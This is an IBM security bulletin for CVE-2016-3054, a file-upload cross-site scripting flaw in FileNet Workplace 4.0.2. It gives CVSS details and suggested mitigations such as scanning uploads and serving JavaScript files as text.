FileNet Workplace is susceptible to the File Upload XSS vulnerability
Relevant CVE Information: CVEID: CVE-2016-3054**
DESCRIPTION:** IBM FileNet Workplace is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
CVSS Base Score: 5.4
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/114753 for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
FileNet Workplace 4.0.2
Refer to the Workarounds and Mitigations section.
There are 2 different implementations that can be used to address this vulnerability. You may chose to implement only one or to use both.
The following are some suggestions on the various ways to prevent malicious files from being either uploaded and/or executed. These methods have not been implemented or tested by IBM. They are just examples. For detailed implementation plans, please consult IBM ECM Lab Services or an IBM ECM Business Partner.
To avoid malicious content being entered in to the P8 repository:
(1) Create a custom event action thatβs triggered on an AddDocument event that checks either the file type being added or calls a file scanner to validate the contents before the content is added.
(2) Configure a file scanner to scan the storage volume where content is being saved and have it send an alert when it finds malicious content.
To prevent content that contains JavaScript code from being executed when it is viewed by AE:
(1) Force JavaScript files to be viewed as text. An AE response filter could be implemented to change the MIME Type from JavaScript to Text.
(2) Configure your browser to not execute JavaScript files.